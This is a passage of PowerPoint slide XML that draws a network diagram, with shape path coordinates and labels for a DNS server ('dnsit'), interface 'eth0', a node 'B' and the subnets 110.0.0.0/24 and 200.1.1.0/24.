                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7F5B40-960E-6B35-B430-2F3DC91A2E72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB19AA2-3D16-59D7-BBC1-D7CB01F3D6A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1242D84A-95FE-6D8C-7CAC-E105E309E89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF843C2-C0EB-728F-42EB-46B5E288CAC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842B0EB1-4FF5-41A2-6293-DE77A24CC442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71DE872-0D38-9676-1D42-DFD72C59958D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802AB8B5-D754-FEC6-8B92-4908D7925D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B09D66C-8525-217B-5D02-5A0E677A15AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBA00D3-C07E-BFCE-CD9E-0F1CF2A819C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C766587A-38D0-19C5-FB62-2C182D5B266D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736679B3-9715-2CC0-0F46-4477D1A83CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3131147-7C6D-5AD3-4679-F3EAA061DB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19736D24-5AAE-C331-1CC4-9C01C6FC5DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Connector 327">
